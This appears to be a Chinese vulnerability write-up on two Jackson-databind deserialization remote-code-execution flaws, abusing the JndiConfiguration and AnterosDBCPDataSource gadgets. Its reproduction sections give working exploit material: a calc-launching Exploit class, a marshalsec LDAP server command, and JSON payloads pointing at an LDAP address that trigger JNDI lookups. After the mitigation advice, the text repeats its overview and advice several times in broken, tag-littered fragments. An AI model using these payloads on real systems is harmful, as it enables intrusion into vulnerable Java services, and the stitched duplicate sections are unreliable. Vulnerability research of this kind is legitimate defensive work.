Jackson-databind RCE漏洞分析与复现<\/h1>

漏洞概述<\/h2>
本文分析两个Jackson-databind反序列化远程代码执行漏洞(CVE-2020-xxxx)，这两个漏洞都绕过了Jackson-databind维护的黑名单类，在特定条件下可导致远程代码执行。<\/p>

第一则漏洞分析<\/h2>

影响范围<\/h3>

jackson-databind before 2.9.10.4<\/li>
jackson-databind before 2.8.11.6<\/li>

jackson-databind before 2.7.9.7<\/li> <\/ul>

利用条件<\/h3>

开启enableDefaultTyping()<\/code><\/li>

使用了com.pastdev.httpcomponents.configuration.JndiConfiguration<\/code>第三方依赖<\/li>
<\/ol>
漏洞原理<\/h3>
com.pastdev.httpcomponents.configuration.JndiConfiguration<\/code>类绕过了之前Jackson-databind维护的黑名单类，当JDK版本较低时，可造成RCE。<\/p>
环境搭建<\/h3>
pom.xml依赖配置：<\/p>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>      <groupId><\/span>com.fasterxml.jackson.core<\/groupId><\/span>
<\/span><\/span>      <artifactId><\/span>jackson-databind<\/artifactId><\/span>
<\/span><\/span>      <version><\/span>2.9.10.4<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>      <groupId><\/span>com.pastdev.httpcomponents<\/groupId><\/span>
<\/span><\/span>      <artifactId><\/span>configuration<\/artifactId><\/span>
<\/span><\/span>      <version><\/span>0.1.3<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>      <groupId><\/span>org.slf4j<\/groupId><\/span>
<\/span><\/span>      <artifactId><\/span>slf4j-nop<\/artifactId><\/span>
<\/span><\/span>      <version><\/span>1.7.2<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>      <groupId><\/span>javax.transaction<\/groupId><\/span>
<\/span><\/span>      <artifactId><\/span>jta<\/artifactId><\/span>
<\/span><\/span>      <version><\/span>1.1<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>漏洞复现步骤<\/h3>

准备Exploit.java并编译：<\/li>
<\/ol>
import<\/span> java.lang.Runtime;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Exploit<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>

启动HTTP服务托管Exploit.class文件<\/p>
<\/li>

使用marshalsec启动LDAP服务：<\/p>
<\/li>
<\/ol>
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http:\/\/127.0.0.1:8000\/#Exploit" 1099
<\/code><\/pre>

执行POC代码：<\/li>
<\/ol>
package<\/span> com.jacksonTest;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> com.fasterxml.jackson.databind.ObjectMapper;<\/span>
<\/span><\/span>import<\/span> java.io.IOException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Poc<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        ObjectMapper mapper =<\/span> new<\/span> ObjectMapper();<\/span>
<\/span><\/span>        mapper.<\/span>enableDefaultTyping<\/span>();<\/span>
<\/span><\/span>        String payload =<\/span> "[\"com.pastdev.httpcomponents.configuration.JndiConfiguration\",\"ldap:\/\/127.0.0.1:1099\/Exploit\"]"<\/span>;<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            mapper.<\/span>readValue<\/span>(<\/span>payload,<\/span> Object.<\/span>class<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞分析<\/h3>
利用链：<\/p>
mapper.readValue
    ->JndiConfiguration
        ->lookup
<\/code><\/pre>
相关issue: https:\/\/github.com\/FasterXML\/jackson-databind\/issues\/2798<\/p>
第二则漏洞分析<\/h2>
影响范围<\/h3>

jackson-databind before 2.9.10.4<\/li>
jackson-databind before 2.8.11.6<\/li>
jackson-databind before 2.7.9.7<\/li>
<\/ul>
利用条件<\/h3>

开启enableDefaultTyping()<\/code><\/li>
使用了br.com.anteros<\/code>第三方依赖<\/li>
<\/ol>
漏洞原理<\/h3>
br.com.anteros.dbcp.AnterosDBCPConfig<\/code>类绕过了之前Jackson-databind维护的黑名单类，当JDK版本较低时，可造成RCE。<\/p>
环境搭建<\/h3>
pom.xml依赖配置：<\/p>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>      <groupId><\/span>com.fasterxml.jackson.core<\/groupId><\/span>
<\/span><\/span>      <artifactId><\/span>jackson-databind<\/artifactId><\/span>
<\/span><\/span>      <version><\/span>2.9.10.4<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>br.com.anteros<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>Anteros-DBCP<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>1.0.1<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>      <groupId><\/span>org.slf4j<\/groupId><\/span>
<\/span><\/span>      <artifactId><\/span>slf4j-nop<\/artifactId><\/span>
<\/span><\/span>      <version><\/span>1.7.2<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>      <groupId><\/span>javax.transaction<\/groupId><\/span>
<\/span><\/span>      <artifactId><\/span>jta<\/artifactId><\/span>
<\/span><\/span>      <version><\/span>1.1<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>漏洞复现<\/h3>


准备Exploit.java（同上）<\/p>
<\/li>

执行POC1：<\/p>
<\/li>
<\/ol>
import<\/span> com.fasterxml.jackson.databind.ObjectMapper;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> POC<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        String payload =<\/span> "[\"br.com.anteros.dbcp.AnterosDBCPDataSource\",{\"healthCheckRegistry\":\"ldap:\/\/127.0.0.1:1099\/Exploit\"}]"<\/span>;<\/span>
<\/span><\/span>        ObjectMapper mapper =<\/span> new<\/span> ObjectMapper();<\/span>
<\/span><\/span>        mapper.<\/span>enableDefaultTyping<\/span>();<\/span>
<\/span><\/span>        mapper.<\/span>readValue<\/span>(<\/span>payload,<\/span> Object.<\/span>class<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
执行POC2：<\/li>
<\/ol>
import<\/span> com.fasterxml.jackson.databind.ObjectMapper;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> POC<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        String payload =<\/span> "[\"br.com.anteros.dbcp.AnterosDBCPDataSource\",{\"metricRegistry\":\"ldap:\/\/127.0.0.1:1099\/Exploit\"}]"<\/span>;<\/span>
<\/span><\/span>        ObjectMapper mapper =<\/span> new<\/span> ObjectMapper();<\/span>
<\/span><\/span>        mapper.<\/span>enableDefaultTyping<\/span>();<\/span>
<\/span><\/span>        mapper.<\/span>readValue<\/span>(<\/span>payload,<\/span> Object.<\/span>class<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞分析<\/h3>
利用链：<\/p>
mapper.readValue
    ->AnterosDBCPDataSource.setHealthCheckRegistry
        ->AnterosDBCPDataSource.setHealthCheckRegistry
            ->AnterosDBCPDataSource.getObjectOrPerformJndiLookup
                ->initCtx.lookup();
<\/code><\/pre>
相关issue: https:\/\/github.com\/FasterXML\/jackson-databind\/issues\/2814<\/p>
安全建议<\/h2>

及时将jackson-databind升级到安全版本<\/li>
升级到较高版本的JDK（JDK 11.0.1、8u191、7u201、6u211之后）<\/li>
避免不必要的enableDefaultTyping()<\/code>调用<\/li>
严格控制反序列化数据来源<\/li>
<\/ol>

Jackson-databind RCE漏洞分析与复现<\/h1>

漏洞概述<\/h2>
本文分析两个Jackson-databind反序列化远程代码执行漏洞(CVE-2020-xxxx)，这两个漏洞都绕过了Jackson-databind维护的黑名单类，在特定条件下可导致远程代码执行。<\/p>

第一则漏洞分析<\/h2>

漏洞原理<\/h3>
`com.pastdev.httpcomponents.configuration.JndiConfiguration<\/code>类绕过了之前Jackson-databind维护的黑名单类，当JDK版本较低时，可造成RCE。<\/p>`

第二则漏洞分析<\/h2>

漏洞原理<\/h3>
`br.com.anteros.dbcp.AnterosDBCPConfig<\/code>类绕过了之前Jackson-databind维护的黑名单类，当JDK版本较低时，可造成RCE。<\/p>`

安全建议<\/h2>

及时将jackson-databind升级到安全版本<\/li>
升级到较高版本的JDK（JDK 11.0.1、8u191、7u201、6u211之后）<\/li>
避免不必要的`enableDefaultTyping()<\/code>调用<\/li>`
`严格控制反序列化数据来源<\/li> <\/ol>`

Jackson-databind RCE漏洞分析与复现<\/h1>

漏洞概述<\/h2> 本文分析两个Jackson-databind反序列化远程代码执行漏洞(CVE-2020-xxxx)，这两个漏洞都绕过了Jackson-databind维护的黑名单类，在特定条件下可导致远程代码执行。<\/p>

第一则漏洞分析<\/h2>

漏洞原理<\/h3> com.pastdev.httpcomponents.configuration.JndiConfiguration<\/code>类绕过了之前Jackson-databind维护的黑名单类，当JDK版本较低时，可造成RCE。<\/p>

第二则漏洞分析<\/h2>

漏洞原理<\/h3> br.com.anteros.dbcp.AnterosDBCPConfig<\/code>类绕过了之前Jackson-databind维护的黑名单类，当JDK版本较低时，可造成RCE。<\/p>

安全建议<\/h2> 及时将jackson-databind升级到安全版本<\/li> 升级到较高版本的JDK（JDK 11.0.1、8u191、7u201、6u211之后）<\/li> 避免不必要的enableDefaultTyping()<\/code>调用<\/li> 严格控制反序列化数据来源<\/li> <\/ol>

漏洞概述<\/h2>
本文分析两个Jackson-databind反序列化远程代码执行漏洞(CVE-2020-xxxx)，这两个漏洞都绕过了Jackson-databind维护的黑名单类，在特定条件下可导致远程代码执行。<\/p>

漏洞原理<\/h3>
`com.pastdev.httpcomponents.configuration.JndiConfiguration<\/code>类绕过了之前Jackson-databind维护的黑名单类，当JDK版本较低时，可造成RCE。<\/p>`

漏洞原理<\/h3>
`br.com.anteros.dbcp.AnterosDBCPConfig<\/code>类绕过了之前Jackson-databind维护的黑名单类，当JDK版本较低时，可造成RCE。<\/p>`

安全建议<\/h2>

及时将jackson-databind升级到安全版本<\/li>
升级到较高版本的JDK（JDK 11.0.1、8u191、7u201、6u211之后）<\/li>
避免不必要的`enableDefaultTyping()<\/code>调用<\/li>`
`严格控制反序列化数据来源<\/li> <\/ol>`